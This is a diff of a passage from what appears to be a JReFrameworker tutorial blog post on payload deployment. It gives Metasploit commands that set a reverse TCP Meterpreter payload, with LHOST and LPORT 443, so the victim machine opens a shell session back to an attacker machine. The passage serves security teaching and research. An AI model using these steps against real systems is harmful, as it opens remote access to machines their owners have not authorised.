JReFrameworker/JReFrameworker.github.io/_posts/2017-1-7-payload-deployment.md

 Finally let's configure a reverse TCP Meterpreter payload that will execute Meterpreter on the victim machine and connect back to our attacker machine with the active session.
 Configure the payload by typing `set PAYLOAD windows/meterpreter/reverse_tcp`.

-Set the outbound Meterpreter connection address to be the IP address of the attacker machine by typing `set LHOST 192.168.115.128`.
+Set the outbound Meterpreter connection address to be the local host (the IP address of the attacker machine) by typing `set LHOST 192.168.115.128`.

 Set the outbound Meterpreter connection port to be port 443 (https) by typing `set LPORT 443`.